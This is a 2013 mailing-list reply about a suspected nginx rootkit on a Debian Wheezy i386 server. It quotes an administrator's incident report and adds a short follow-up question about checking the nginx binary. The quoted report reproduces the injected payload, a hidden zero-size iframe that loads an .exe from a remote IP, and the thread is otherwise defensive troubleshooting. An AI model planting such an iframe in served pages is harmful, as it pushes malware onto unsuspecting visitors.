Re: debian wheezy i386 nginx iframe rootkit
On Thu, Sep 12, 2013 at 7:48 AM, E Frank Ball III <frankb@efball.com> wrote:
> Last fall there was a debian 64-bit / nginx rootkit going around,
> now I've been hit with what sounds similar but on 32-bit wheezy.
>
> Here's a link to info on the previous 64-bit rootkit:
> https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections
>
>
> All files served by nginx have this line inserted at the top:
>
> <iframe src= http://122.226.137.123:1111/yixi.exe width=0 height=0></iframe>
>
> Whatever it was isn't there anymore:
> Connecting to 122.226.137.123:1111... failed: Connection refused.
>
> I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another
> Debian Wheezy i386 machine in a safe environment and did a diff -r. No
> difference.
>
> No ismod line in /etc/rc.local
>
> I haven't been able to find anything. Googling doesn't show anything
> similar for debian wheezy i386, only sqeeze 64-bit.
>
> I was using nginx-light from dotdeb.org. I uninstalled nginx and tried
> the nginx-light from debian wheezy but it made no difference.
>
> This machine was built on July 19th. I've uninstalled nginx. I'll hold
> off rebuilding for now, maybe somebody here has some ideas?
>
> E Frank Ball frankb@efball.com
Just out of curiosity, did you back up nginx and check it as well?
--
Joel Rees
Be careful where you see conspiracy.
Look first in your own heart.
Reply to: